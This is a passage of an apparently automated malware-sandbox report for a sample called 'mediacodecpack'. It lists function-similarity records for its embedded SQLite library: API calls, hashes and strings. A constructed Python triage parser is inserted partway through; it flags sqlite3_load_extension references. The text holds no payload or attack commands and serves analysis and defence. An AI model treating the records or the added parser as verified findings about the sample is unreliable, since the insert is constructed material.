                                                                                        • Instruction Fuzzy Hash: 8C3178B0A08324DFEB24CF28C481B4ABBF6FBA5318F04C499E4888B251C775D885DF42
APIs
• sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 609034D8
• sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903521
• sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 6090354A
• sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903563
Memory Dump Source
• Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
Similarity
• API ID: sqlite3_mutex_entersqlite3_mutex_leave
• String ID:
• API String ID: 1477753154-0
• Opcode ID: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
• Instruction ID: 848dca46e936c6e01d33e08870ae11aa620bd8b24bdb606da7ea596206f2e213
• Opcode Fuzzy Hash: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
• Instruction Fuzzy Hash: 44111F726186218FDB00EF7DC8817597FEAFB66308F00842DE865E7362E779D8819741
APIs
• sqlite3_initialize.SQLITE3 ref: 6092A450
  • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
• sqlite3_mutex_enter.SQLITE3 ref: 6092A466
• sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
• sqlite3_memory_used.SQLITE3 ref: 6092A4BA
Memory Dump Source
• Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
Similarity
• API ID: sqlite3_mutex_enter$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_leave
• String ID:
• API String ID: 2673540737-0
• Opcode ID: 58333c90df1895ca2798dafcbab41657529afc007f85020e925d8580cfdcdfcb
• Instruction ID: c4988029ba64cfb2248a7cf0c790324acf4c13eb0f9cd3f15fdedc175ef3c91a
• Opcode Fuzzy Hash: 58333c90df1895ca2798dafcbab41657529afc007f85020e925d8580cfdcdfcb
• Instruction Fuzzy Hash: F9019276E143148BCB00EF79D88561ABFE7FBA5324F008528EC9497364E735DC408B81
APIs
Memory Dump Source
• Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
Similarity
• API ID: sqlite3_value_text$sqlite3_freesqlite3_load_extension
• String ID:
• API String ID: 3526213481-0
• Opcode ID: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
• Instruction ID: 98199466554994e62e20ad809be6129e3c08b78dd6d8c38fc18f61524e73aad2
• Opcode Fuzzy Hash: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
• Instruction Fuzzy Hash: 4101E9B5A043059BCB00EF69D485AAFBBF5EF68654F10C529EC9497304E774D841CF91
APIs
• sqlite3_prepare.SQLITE3 ref: 60969166
• sqlite3_errmsg.SQLITE3 ref: 60969172
  • Part of subcall function 609258A8: sqlite3_log.SQLITE3 ref: 609258E5
• sqlite3_errcode.SQLITE3 ref: 6096918A
  • Part of subcall function 609251AA: sqlite3_log.SQLITE3 ref: 609251E8
• sqlite3_step.SQLITE3 ref: 60969197
Memory Dump Source
• Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
Similarity
• API ID: sqlite3_log$sqlite3_errcodesqlite3_errmsgsqlite3_preparesqlite3_step
• String ID:
• API String ID: 2877408194-0
• Opcode ID: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
• Instruction ID: d4ebd4c9a05a553e526e78eaaf80584f3afcfe73b3175c4c6dada352db343273
• Opcode Fuzzy Hash: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
• Instruction Fuzzy Hash: 9F0186B091C3059BE700EF29C88525DFBE9EFA5314F11892DA89987384E734C940CB86
APIs
Memory Dump Source
• Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
Similarity
• API ID: sqlite3_freesqlite3_mprintfsqlite3_value_blobsqlite3_value_bytes
• String ID:
• API String ID: 1163609955-0
• Opcode ID: c446836a4840d302dbdc97fcf3f25a19881b43244be54ce00609cbc101420811
• Instruction ID: 8e0d1a1b7fe9adeaf330fda5a565ce202833de3a42fcd494fa905fee92021967
• Opcode Fuzzy Hash: c446836a4840d302dbdc97fcf3f25a19881b43244be54ce00609cbc101420811
• Instruction Fuzzy Hash: F6F0C8716282145FC3106F3994816697BE6DFA6758F0144A9F584CB314DB75CC82C742
APIs
• sqlite3_prepare_v2.SQLITE3 ref: 609615BA
• sqlite3_step.SQLITE3 ref: 609615C9
• sqlite3_column_int.SQLITE3 ref: 609615E1
  • Part of subcall function 6091D4F4: sqlite3_value_int.SQLITE3 ref: 6091D50C
• sqlite3_finalize.SQLITE3 ref: 609615EE
Memory Dump Source
• Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
Similarity
• API ID: sqlite3_column_intsqlite3_finalizesqlite3_prepare_v2sqlite3_stepsqlite3_value_int
• String ID:
• API String ID: 4265739436-0
• Opcode ID: edb1a347b7ee41d63e69a54b369763b34702b79c0c254a7699785c0090147395
• Instruction ID: 970f7a8085286b868af170b9ae73916577c28f03d50975cfa6e3c5bd991c66ad
• Opcode Fuzzy Hash: edb1a347b7ee41d63e69a54b369763b34702b79c0c254a7699785c0090147395
• Instruction Fuzzy Hash: BE01E4B0D083049BEB10EF69C58575EFBF9EFA5314F00896DE8A997380E775D9408B82
APIs
• sqlite3_initialize.SQLITE3 ref: 6092A638
  • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
• sqlite3_mutex_enter.SQLITE3 ref: 6092A64F
• strcmp.MSVCRT ref: 6092A66A
• sqlite3_mutex_leave.SQLITE3 ref: 6092A67D
Memory Dump Source
• Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
Similarity
• API ID: sqlite3_mutex_enter$sqlite3_initializesqlite3_mutex_leavestrcmp
• String ID:
• API String ID: 1894734062-0
• Opcode ID: 1480f87154849f1cdf239baa72c9ff1b5e3c835899009c68b4affe8256d9fce5
• Instruction ID: 0dacd04717b96a229033e5bf385d74358d6efc238696297f04088f4a0acd15ee
• Opcode Fuzzy Hash: 1480f87154849f1cdf239baa72c9ff1b5e3c835899009c68b4affe8256d9fce5
• Instruction Fuzzy Hash: EBF0B4726243044BC7006F799CC164A7FAEEEB1298B05802CEC548B319EB35DC0297A1
APIs
• sqlite3_mutex_enter.SQLITE3 ref: 609084E9
• sqlite3_mutex_leave.SQLITE3 ref: 60908518
• sqlite3_mutex_enter.SQLITE3 ref: 60908528
• sqlite3_mutex_leave.SQLITE3 ref: 6090855B
Memory Dump Source
• Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
Similarity
• API ID: sqlite3_mutex_entersqlite3_mutex_leave
• String ID:
• API String ID: 1477753154-0
• Opcode ID: dbb0a767127359d75753d9f151f7b9e03affe710ab86404e29d94d971225fba8
• Instruction ID: c41a4d3f3efa942db11cbd34a9101edfe28f26dd6f673ba1da0d5803e4a0adbd
• Opcode Fuzzy Hash: dbb0a767127359d75753d9f151f7b9e03affe710ab86404e29d94d971225fba8
• Instruction Fuzzy Hash: FD01A4B05093048BDB40AF25C5D97CABBA5EF15718F0884BDEC894F34AD7B9D5448BA1
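The records above are the Joe Sandbox IDA plugin's per-function similarity data for the SQLite image mapped at 60900000 (mediacodecpack): the API refs in address order, the API ID naming the calls, the API String ID that keys the similarity lookup, and the Opcode/Instruction IDs and fuzzy hashes of the function body. As an added example (not part of this report, and not code from the analysed sample or from SQLite), the Python below parses these records and answers two triage questions a reader of a report this long wants answered quickly: which functions reference sqlite3_load_extension, an API that loads a shared library into the process and is therefore worth locating in an embedded SQLite build, and which distinct functions share an API String ID (here 1477753154-0, carried by two mutex wrappers with different Opcode IDs). The sample text is copied from the records above and trimmed to the fields used; the function names, the watchlist, and the rule that a record is flagged on its API ID string as well as on its refs are this example's own assumptions.

```python
import re
from collections import defaultdict

# Constructed sample: four function records copied from the report section above, trimmed to the
# fields used here. Record layout is Joe Sandbox's; parser and triage rules are this example's own.
SAMPLE = """\
APIs
Similarity
• API ID: sqlite3_value_text$sqlite3_freesqlite3_load_extension
• String ID:
• API String ID: 3526213481-0
• Opcode ID: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
APIs
• sqlite3_prepare.SQLITE3 ref: 60969166
• sqlite3_errmsg.SQLITE3 ref: 60969172
  • Part of subcall function 609258A8: sqlite3_log.SQLITE3 ref: 609258E5
• sqlite3_errcode.SQLITE3 ref: 6096918A
  • Part of subcall function 609251AA: sqlite3_log.SQLITE3 ref: 609251E8
• sqlite3_step.SQLITE3 ref: 60969197
Similarity
• API ID: sqlite3_log$sqlite3_errcodesqlite3_errmsgsqlite3_preparesqlite3_step
• API String ID: 2877408194-0
• Opcode ID: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
APIs
• sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 609034D8
• sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903521
• sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 6090354A
• sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903563
Similarity
• API ID: sqlite3_mutex_entersqlite3_mutex_leave
• API String ID: 1477753154-0
• Opcode ID: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
APIs
• sqlite3_mutex_enter.SQLITE3 ref: 609084E9
• sqlite3_mutex_leave.SQLITE3 ref: 60908518
• sqlite3_mutex_enter.SQLITE3 ref: 60908528
• sqlite3_mutex_leave.SQLITE3 ref: 6090855B
Similarity
• API ID: sqlite3_mutex_entersqlite3_mutex_leave
• API String ID: 1477753154-0
• Opcode ID: dbb0a767127359d75753d9f151f7b9e03affe710ab86404e29d94d971225fba8
"""

# One bullet under "APIs": optional subcall prefix, name.MODULE, optional (args), ref address.
API_RE = re.compile(r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?(?P<name>\w+)\.(?P<module>\w+)"
                    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")


def parse_records(text):
    """Split report text into function records; every "APIs" header starts a new one."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if not line.startswith("•"):            # section header: APIs, Strings, Similarity, ...
            section = line
            if line == "APIs":
                rec = {"apis": [], "fields": {}}
                records.append(rec)
            continue
        if rec is None:                          # text before the first record
            continue
        body = line[1:].strip()
        m = API_RE.match(body) if section == "APIs" else None
        if m:
            rec["apis"].append({"name": m["name"], "module": m["module"], "args": m["args"],
                                "ref": int(m["ref"], 16), "subcall": m["sub"]})
        else:                                    # "Key: value" bullet; first occurrence wins
            key, _, value = body.partition(":")
            rec["fields"].setdefault(key.strip(), value.strip())
    return records


def call_sequence(rec, with_subcalls=False):
    """API names in address order, optionally including calls made from callees."""
    return [a["name"] for a in rec["apis"] if with_subcalls or a["subcall"] is None]


def flag_apis(records, watchlist):
    """(Opcode ID, api) per record referencing a watched API, via its refs or its API ID string."""
    hits = []
    for rec in records:
        names = set(call_sequence(rec, with_subcalls=True))
        api_id = rec["fields"].get("API ID", "")      # covers records that list no refs at all
        hits += [(rec["fields"].get("Opcode ID", ""), api) for api in watchlist if api in names or api in api_id]
    return hits


def shared_signatures(records):
    """API String ID -> Opcode IDs, for signatures shared by more than one function."""
    groups = defaultdict(list)
    for rec in records:
        groups[rec["fields"].get("API String ID")].append(rec["fields"].get("Opcode ID"))
    return {sig: ids for sig, ids in groups.items() if len(ids) > 1}


# sqlite3_load_extension loads a shared library into the process; the watchlist is this example's choice.
WATCHLIST = ("sqlite3_load_extension", "sqlite3_enable_load_extension")
```

Calling parse_records(SAMPLE) yields four records. flag_apis(recs, WATCHLIST) returns the Opcode ID e69664dd... for the sqlite3_load_extension record even though that record lists no refs, which is why the API ID string is checked alongside the refs; shared_signatures(recs) returns the two Opcode IDs filed under 1477753154-0. Running the same functions over the full report means reading the saved page text in place of SAMPLE.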
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_log
                                                                                        • String ID: into$out of
                                                                                        • API String ID: 632333372-1114767565
                                                                                        • Opcode ID: 05e60a680804dc8d75cc30d301a58b6784d3cbcabfb13c7dcba40214300a3b29
                                                                                        • Instruction ID: de20b162988cb891a2f8fbcf22309076e3e21d241eadb06c465d82de9f0e8d92
                                                                                        • Opcode Fuzzy Hash: 05e60a680804dc8d75cc30d301a58b6784d3cbcabfb13c7dcba40214300a3b29
                                                                                        • Instruction Fuzzy Hash: 91910170A043149BDB26CF28C88175EBBBABF65308F0481E9E858AB355D7B5DE85CF41
                                                                                        APIs
                                                                                          • Part of subcall function 60918408: sqlite3_value_text.SQLITE3 ref: 60918426
                                                                                        • sqlite3_free.SQLITE3 ref: 609193A3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_freesqlite3_value_text
                                                                                        • String ID: (NULL)$NULL
                                                                                        • API String ID: 2175239460-873412390
                                                                                        • Opcode ID: 2d639d8f8789be8f4f2115c7e339461789bfa1512606a4b94e85873a15b94a2d
                                                                                        • Instruction ID: 63658e955800b40111a930d2026d12727b3b294c4be858d68b3f7c51d7abf176
                                                                                        • Opcode Fuzzy Hash: 2d639d8f8789be8f4f2115c7e339461789bfa1512606a4b94e85873a15b94a2d
                                                                                        • Instruction Fuzzy Hash: E3514B31F0825A8EEB258A68C89479DBBB6BF66304F1441E9C4A9AB241D7309DC6CF01
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_log
                                                                                        • String ID: string or blob too big$|
                                                                                        • API String ID: 632333372-330586046
                                                                                        • Opcode ID: b6301cf988e6664baaa8b4960c9a349f418ad1f33ca54faa928bbeacb0d503e6
                                                                                        • Instruction ID: 65a9847582dc10a4f4f17f1c4fc8d82f10366072c52f03016cacc5a11d353e3e
                                                                                        • Opcode Fuzzy Hash: b6301cf988e6664baaa8b4960c9a349f418ad1f33ca54faa928bbeacb0d503e6
                                                                                        • Instruction Fuzzy Hash: 4D51B9749083689BCB22CF28C985789BBF6BF59314F1086D9E49897351C775EE81CF41
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_log
                                                                                        • String ID: d$|
                                                                                        • API String ID: 632333372-415524447
                                                                                        • Opcode ID: b41da94c8e0873fb31ce46b9bf1ec845f2d469f37e36bd2a55cc8f8885e561b5
                                                                                        • Instruction ID: dac03e427e93f591f5d1737f90c886445feec93ea56e6f6f32424ebbe55d5cce
                                                                                        • Opcode Fuzzy Hash: b41da94c8e0873fb31ce46b9bf1ec845f2d469f37e36bd2a55cc8f8885e561b5
                                                                                        • Instruction Fuzzy Hash: 50510970A04329DBDB26CF19C981799BBBABF55308F0481D9E958AB341D735EE81CF41
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_log
                                                                                        • String ID: -- $d
                                                                                        • API String ID: 632333372-777087308
                                                                                        • Opcode ID: 04c39e600f9b005651fcb68da317ac4a80b79d2e803021aaf364a84fff9736a0
                                                                                        • Instruction ID: 827f605eab188c5b26b82399601ab0ab65c2dc521f736992582695f4996adf34
                                                                                        • Opcode Fuzzy Hash: 04c39e600f9b005651fcb68da317ac4a80b79d2e803021aaf364a84fff9736a0
                                                                                        • Instruction Fuzzy Hash: 5651F674A042689FDB26CF28C885789BBFABF55304F1081D9E99CAB341C7759E85CF41
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_logsqlite3_value_text
                                                                                        • String ID: string or blob too big
                                                                                        • API String ID: 2320820228-2803948771
                                                                                        • Opcode ID: 4552165c49a92a3f1eebbde7746405f837ee0ef0562a3825501d2540ddfe4a5c
                                                                                        • Instruction ID: 1f8da1134a73d261049fdcd83983d84c916c8a3f87851362e697cdb17b1d2bab
                                                                                        • Opcode Fuzzy Hash: 4552165c49a92a3f1eebbde7746405f837ee0ef0562a3825501d2540ddfe4a5c
                                                                                        • Instruction Fuzzy Hash: F631D9B0A083249BCB25DF28C881799B7FABF69304F0085DAE898A7301D775DE81CF45
                                                                                        APIs
                                                                                        • sqlite3_aggregate_context.SQLITE3 ref: 60914096
                                                                                        • sqlite3_value_numeric_type.SQLITE3 ref: 609140A2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_aggregate_contextsqlite3_value_numeric_type
                                                                                        • String ID:
                                                                                        • API String ID: 3265351223-3916222277
                                                                                        • Opcode ID: 46809e466d9dc696839b8d734d1d71a7cd961db8d22299a3a9f395bc6b436a6c
                                                                                        • Instruction ID: a3c0f903ff645dd1c5a8146eaa2078e963ad6c1b8d1bbf61d5d4caeb1888773d
                                                                                        • Opcode Fuzzy Hash: 46809e466d9dc696839b8d734d1d71a7cd961db8d22299a3a9f395bc6b436a6c
                                                                                        • Instruction Fuzzy Hash: 19119EB0A0C6589BDF059F69C4D539A7BF6AF39308F0044E8D8D08B205E771CD94CB81
                                                                                        APIs
                                                                                        Strings
